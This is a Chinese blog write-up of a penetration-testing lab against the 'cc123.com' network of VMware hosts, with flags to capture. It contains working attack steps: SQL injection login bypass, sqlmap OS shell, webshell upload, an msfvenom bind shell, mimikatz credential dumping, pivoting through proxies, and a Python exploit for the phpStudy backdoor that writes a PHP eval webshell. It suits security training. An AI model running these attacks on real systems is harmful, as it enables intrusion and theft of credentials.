综合渗透测试实战项目

目录

 

1.项目网络拓扑

1.信息收集

netdiscover进行主机发现

端口服务探测

子域名收集

new.cc123.com后台目录扫描

可以参考百度得目录结构

ww2.cc123.com目录扫描

2.漏洞利用

测试站点 http://new.cc123.com/member/

这里我们登入后台

蚁剑连接无法执行命令

我们在次上传asp大马和asp脚本进行扫描可写目录

MSF生成shell脚本上传进行反弹shell

MSF提权

测试站点  ww2.cc123.com

获取flag3

.net代码审计

3.内网渗透

内网信息收集

网卡信息

路由信息

哈希获取

使用mimikatz获取明文

添加路由

探测内网存活主机

启动socks代理

查看Web.config文件获取账号密码

msf生成正向的shell

MSF监听正向shell

数据库服务器信息收集

mimikatz抓取密码

内网主机扫描

代理访问10.10.1.129:80

phpstuday后门利用

编写python后门利用脚本

写入PHP一句话

使用蚁剑代理连接php一句话

上传msf正向shell

内网目标机器信息收集


1.项目网络拓扑

1.信息收集

netdiscover进行主机发现

sudo netdiscover -i eth0 -r 192.168.3.0/24

端口服务探测

这里使用两款工具一款是nmap

nmap -A 192.168.3.134 -p- -oN nmap.a
kali@ToolsScannerKali20201:~/Desktop$ nmap -A 192.168.3.134 -p- -oN nmap.a
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-05 05:42 EST
Nmap scan report for 192.168.3.134
Host is up (0.00052s latency).
Not shown: 65526 filtered ports
PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain             Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp    open  http               Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
135/tcp   open  msrpc              Microsoft Windows RPC
999/tcp   open  http               Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry 
|_/                                                                                                                                   
|_http-server-header: Microsoft-IIS/7.5                                                                                               
|_http-title: phpMyAdmin                                                                                                              
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-date: 2021-02-05T10:44:48+00:00; 0s from scanner time.
6588/tcp  open  http               Microsoft IIS httpd 7.5
| http-cookie-flags: 
|   /: 
|     ASPSESSIONIDSQSRBBAD: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: \xBB\xA4\xCE\xC0\xC9\xF1\xA1\xA4\xD6\xF7\xBB\xFA\xB4\xF3\xCA\xA6 V3.5.1 - \xC7\xB0\xCC\xA8\xB5\xC7\xC2\xBC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.24 seconds

发现这是一台DNS服务器我跟可以添加本地DNS域名解析指向此服务器。

子域名收集

wfuzz穷举子域名

wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53

new.cc123.com后台目录扫描

kali@ToolsScannerKali20201:~/Desktop$ gobuster dir -u http://new.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://new.cc123.com
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/02/05 07:30:44 Starting gobuster
===============================================================
/images (Status: 301)
/news (Status: 301)
/contact (Status: 301)
/about (Status: 301)
/faq (Status: 301)
/help (Status: 301)
/uploads (Status: 301)
/data (Status: 301)
/a (Status: 301)
/Images (Status: 301)
/News (Status: 301)
/member (Status: 301)
/FAQ (Status: 301)
/special (Status: 301)
/m (Status: 301)
/Contact (Status: 301)
/About (Status: 301)
/install (Status: 301)
/Help (Status: 301)
/plus (Status: 301)
/A (Status: 301)
/M (Status: 301)
/include (Status: 301)
/cp (Status: 301)
/NEWS (Status: 301)
/skin (Status: 301)
/case (Status: 301)
/INSTALL (Status: 301)
/CP (Status: 301)
/IMAGES (Status: 301)
/Data (Status: 301)
/Special (Status: 301)
/Uploads (Status: 301)
/Member (Status: 301)
/Faq (Status: 301)
/Install (Status: 301)
/CONTACT (Status: 301)
/Include (Status: 301)
/ABOUT (Status: 301)
/HELP (Status: 301)
/DATA (Status: 301)
/CASE (Status: 301)
/Skin (Status: 301)
/Case (Status: 301)
===============================================================
2021/02/05 07:31:13 Finished
===============================================================

 

可以参考百度得目录结构

ww2.cc123.com目录扫描

 

2.漏洞利用

测试站点 http://new.cc123.com/member/

添加分类进行sql注入

这里MD5很明显多了一位  因为MD5加密后是32位为双数位

812df726be884ddcfc41 admin7788

这里我们登入后台

这里我们上传PHP一句话获取webshell

蚁剑连接无法执行命令

我们在次上传asp大马和asp脚本进行扫描可写目录

MSF生成shell脚本上传进行反弹shell

MSF提权

检测提权漏洞

meterpreter > 
meterpreter > background 
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > set session 1

shell

chcp 65001   //解决编码问题

flag1

flag2

测试站点  ww2.cc123.com

kali@ToolsScannerKali20201:~/Desktop$ gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "aspx,html"
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://ww2.cc123.com
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     aspx,html
[+] Timeout:        10s
===============================================================
2021/02/05 08:50:39 Starting gobuster
===============================================================
/admin (Status: 301)
/index.aspx (Status: 200)
/index.html (Status: 200)
/product.aspx (Status: 200)
/product.html (Status: 200)
/News.aspx (Status: 200)
/News.html (Status: 200)
/template (Status: 301)
/About.aspx (Status: 200)
/About.html (Status: 200)
/Index.aspx (Status: 200)
/Index.html (Status: 200)
/style (Status: 301)
/about.aspx (Status: 200)
/about.html (Status: 200)
[ERROR] 2021/02/05 08:50:58 [!] Get http://ww2.cc123.com/messages.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/editor (Status: 301)
/message.aspx (Status: 200)
/message.html (Status: 200)
/stat.aspx (Status: 200)
/NEWS.aspx (Status: 200)
/NEWS.html (Status: 200)
/index_html (Status: 200)
/index_html.aspx (Status: 200)
/index_html.html (Status: 200)
[ERROR] 2021/02/05 08:51:09 [!] Get http://ww2.cc123.com/Product.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/news2.html (Status: 200)
/news1.html (Status: 200)
/uc (Status: 301)
/INDEX.aspx (Status: 200)
/INDEX.html (Status: 200)
/Admin (Status: 301)
/Template (Status: 301)
/news3.html (Status: 200)
/about1.html (Status: 200)
/news01.html (Status: 200)
/Message.aspx (Status: 200)
/Message.html (Status: 200)
/about2.html (Status: 200)
/Style (Status: 301)
/news11.html (Status: 200)
/news4.html (Status: 200)
/news03.html (Status: 200)
/news5.html (Status: 200)
/upimg (Status: 301)
/Messages.html (Status: 200)
/news06.html (Status: 200)
/news02.html (Status: 200)
/news04.html (Status: 200)
/news12.html (Status: 200)
/about3.html (Status: 200)
/news10.html (Status: 200)
/news16.html (Status: 200)
/product1.html (Status: 200)
/news8.html (Status: 200)
/news17.html (Status: 200)
/news15.html (Status: 200)
/news9.html (Status: 200)
/STYLE (Status: 301)
/news23.html (Status: 200)
/news7.html (Status: 200)
/news13.html (Status: 200)
/news05.html (Status: 200)
/News2.html (Status: 200)
/news6.html (Status: 200)
/news20.html (Status: 200)
/news21.html (Status: 200)
/news14.html (Status: 200)
/news25.html (Status: 200)
/Editor (Status: 301)
/product3.html (Status: 200)
/product2.html (Status: 200)
/ABOUT.aspx (Status: 200)
/ABOUT.html (Status: 200)
/UC (Status: 301)
/news18.html (Status: 200)
/news19.html (Status: 200)
/PRODUCT.aspx (Status: 200)
/PRODUCT.html (Status: 200)
/news22.html (Status: 200)
/news28.html (Status: 200)
/News1.html (Status: 200)
/news003.html (Status: 200)
/about4.html (Status: 200)
/news001.html (Status: 200)
/news48.html (Status: 200)
/news30.html (Status: 200)
/news26.html (Status: 200)
/product02.html (Status: 200)
/news55.html (Status: 200)
/news07.html (Status: 200)
/news09.html (Status: 200)
/news29.html (Status: 200)
/TEMPLATE (Status: 301)
===============================================================
2021/02/05 09:01:13 Finished
===============================================================
http://ww2.cc123.com/admin 管理后台
http://ww2.cc123.com/editor 编辑器

后台管理界面登陆框存在SQL注入可绕过密码匹配带入到数据库进行查询

可能是通过sql查询方法进行登录验证。
select * from user where username = 'admin'--+' and password = *****

后台界面修改信息传参处出现sql注入。

sqlmap -r sqlpost.txt --batch

获取sqlmap获取shell

sudo sqlmap -r sqlpost.txt mssql -v 1 --dbs
sudo sqlmap -r sqlpost.txt mssql -v 1 --os-shell

这里我们看到IP为10.10.1.128证明这台机器为内网得数据库服务器,web站点和数据库分离的形式。

获取flag3

.net代码审计

meterpreter > download c:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/bin

3.内网渗透

内网信息收集

网卡信息

ipconfig

meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:71:98:af
MTU          : 1500
IPv4 Address : 192.168.3.134
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c1e2:d216:9dad:969b
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:386
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 13
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:71:98:b9
MTU          : 1500
IPv4 Address : 10.10.10.135
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::2c1c:e958:d8c2:1189
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 14
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:a87
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

两个网卡分别对应两个ip

192.168.3.134 / 10.10.10.135

路由信息

meterpreter > run get_local_subnets

两个网段

哈希获取

meterpreter > run hashdump 

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 20401422a21274279449907862e9d520...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::

使用mimikatz获取明文

migrate 1500

先进行进程前移,防止之后的mimikatz获取密码发生一些错误。

load mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
wdigest
tspkg

0;6131477   NTLM       WIN-KALKEMT3JMA  cc123             Ht6_ifp6nvkjn
0;14708785  NTLM       WIN-KALKEMT3JMA  newcc123          ZtKGmDj0qEbDECSBl5p
0;8663175   NTLM       WIN-KALKEMT3JMA  newcc123          ZtKGmDj0qEbDECSBl5p
0;771729    NTLM       WIN-KALKEMT3JMA  Administrator     !@#Qwe123.

添加路由

run autoroute -s 10.10.10.0/24

 

探测内网存活主机

MSF内网主机探测
meterpreter > run post/windows/gather/arp_scanner rhosts=10.10.10.0/24
端口扫描
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp 
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.135
msf5 auxiliary(scanner/portscan/tcp) > exploit 

[+] 10.10.10.135:         - 10.10.10.135:21 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:53 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:80 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:139 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:135 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:445 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:999 - TCP OPEN
^C[*] 10.10.10.135:         - Caught interrupt from the console...
[*] Auxiliary module execution completed
meterpreter > run post/windows/gather/arp_scanner rhosts=10.10.10.0/24

[*] Running module against WIN-KALKEMT3JMA
[*] ARP Scanning 10.10.10.0/24
[+]     IP: 10.10.10.1 MAC 00:50:56:c0:00:13 (VMware, Inc.)
[+]     IP: 10.10.10.135 MAC 00:0c:29:71:98:b9 (VMware, Inc.)
[+]     IP: 10.10.10.136 MAC 00:0c:29:43:9b:46 (VMware, Inc.)
[+]     IP: 10.10.10.254 MAC 00:50:56:eb:d5:a8 (VMware, Inc.)
[+]     IP: 10.10.10.255 MAC 00:0c:29:71:98:b9 (VMware, Inc.)
meterpreter > background 
[*] Backgrounding session 2...

msf5 auxiliary(scanner/portscan/tcp) > exploit 

[+] 10.10.10.135:         - 10.10.10.135:21 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:53 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:80 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:139 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:135 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:445 - TCP OPEN
[+] 10.10.10.135:         - 10.10.10.135:999 - TCP OPEN
^C[*] 10.10.10.135:         - Caught interrupt from the console...
[*] Auxiliary module execution completed

 

启动socks代理

msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
msf5 auxiliary(server/socks4a) > options
msf5 auxiliary(server/socks4a) > run

nmap代理扫描

sudo vim /etc/proxychains.conf
sudo proxychains nmap -sT -Pn 10.10.10.136

Nmap scan report for 10.10.10.136
Host is up (1.1s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
2383/tcp  open  ms-olap4
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1066.56 seconds
 

我们的sqlmap获取的shell不是交互式shell我们通过之前的aspx大马连接数据库上传一个正向shell进行连接

查看Web.config文件获取账号密码

<add key="ConnectionString" value="server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123.." />

msf生成正向的shell

msfvenom -p windows/meterpreter/bind_tcp lport=54321 -f exe>shell.exe

上传正向shell执行命令

MSF监听正向shell

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.136
set lport 54321
run

数据库服务器信息收集

hash收集

Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

mimikatz抓取密码

 

[0] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[1] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[2] { WIN-JJU7KU45PN7 ; Administrator ; !@#QWEasd123. }
IPv4 Address : 10.10.1.128
IPv4 Netmask : 255.255.255.0
IPv4 Address : 10.10.10.136
IPv4 Netmask : 255.255.255.0

Local subnet: 10.10.1.0/255.255.255.0
Local subnet: 10.10.10.0/255.255.255.0

内网主机扫描

run autoroute -s 10.10.1.0/24
run post/windows/gather/arp_scanner rhosts=10.10.1.0/24

目标 IP 10.10.1.129

端口扫描

[+] 10.10.1.129:          - 10.10.1.129:80 - TCP OPEN
[+] 10.10.1.129:          - 10.10.1.129:135 - TCP OPEN
[+] 10.10.1.129:          - 10.10.1.129:139 - TCP OPEN
[+] 10.10.1.129:          - 10.10.1.129:445 - TCP OPEN
[+] 10.10.1.129:          - 10.10.1.129:3306 - TCP OPEN

代理访问10.10.1.129:80

proxychains firefox http://10.10.1.129

phpstuday后门利用

编写python后门利用脚本

#conding:utf-8

import requests
import sys
import base64

shell = "system('"+sys.argv[1]+"');"
shell_base64 = base64.b64encode(shell.encode('utf-8'))

header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'}

def exploit(url):
    html = requests.get(url=url,headers=header).text
    return html

url = "http://10.10.1.129/"
print(exploit(url))

写入PHP一句话

proxychains python3 ./phpstudayexp.py "echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"

使用蚁剑代理连接php一句话

更改proxychains代理ip

要在 kali /etc/proxychains.conf
127.0.0.1 改成 kali ip 不然物理机代理会失败

上传msf正向shell

内网目标机器信息收集

Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : target
BootKey    : 317aebcebbff049827a6e7f1c7c8bc2e

Rid  : 500
User : Administrator
LM   : 
NTLM : 15132c3d36a7e5d7905e02b478979046

Rid  : 501
User : Guest
LM   : 
NTLM : 
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; TARGET ; !@#QWEasd123. }
[1] { TARGET ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; TARGET ; !@#QWEasd123. }
 

 

 

  • 4
    点赞
  • 44
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值